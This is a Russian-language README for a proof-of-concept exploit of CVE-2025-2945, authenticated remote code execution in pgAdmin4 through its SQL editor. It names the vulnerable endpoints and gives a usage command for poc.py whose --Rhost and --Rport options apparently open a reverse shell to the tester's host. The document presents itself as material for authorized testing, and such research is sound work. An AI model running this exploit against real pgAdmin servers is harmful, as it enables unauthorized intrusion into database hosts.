
Эксплойт-доказательство концепции для аутентифицированного удаленного выполнения кода в pgAdmin4 (CVE-2025-2945) через злоупотребление SQL-редактором. Предназначен для авторизованного тестирования безопасности и обучения.
Этот репозиторий содержит скрипт proof-of-concept, созданный для исследований в области безопасности и авторизованного тестирования на проникновение, связанных с уязвимостью CVE-2025-2945, затрагивающей определённые версии pgAdmin4.
Проблема позволяет аутентифицированному пользователю pgAdmin, имеющему доступ к редактору SQL, инициировать удалённое выполнение кода, злоупотребляя потоком инициализации панели Query Tool. Этот PoC демонстрирует уязвимость только в образовательных, аудиторских и защитных целях.
Этот инструмент предназначен ТОЛЬКО для:
НЕ используйте этот инструмент на любой системе без явного разрешения. Несанкционированное использование незаконно и неэтично. Автор не несёт ответственности за неправомерное использование.
Уязвимость проистекает из логических ошибок в конечных точках инициализации редактора SQL. При взаимодействии с /sqleditor/initialize/ и /sqleditor/panel/ приложение неправильно обрабатывает данные, контролируемые пользователем, что в итоге позволяет с помощью сформированных полезных нагрузок выполнять произвольные команды на бэкенде.
PoC эксплуатирует следующую последовательность конечных точек:
requestspython3 poc.py \
--target-url <pgadmin-url> \
--username <pgadmin-user> \
--password <pgadmin-pass> \
--db-user <db-username> \
--db-pass <db-password> \
--db-name <database> \
--Rhost <your-ip> \
--Rport <your-port>
(Полный пример уже приведён в разделе справки скрипта.)
poc.py → The exploit proof-of-concept
README.md → Project documentation
Администраторам следует:
Автор: UdayVeer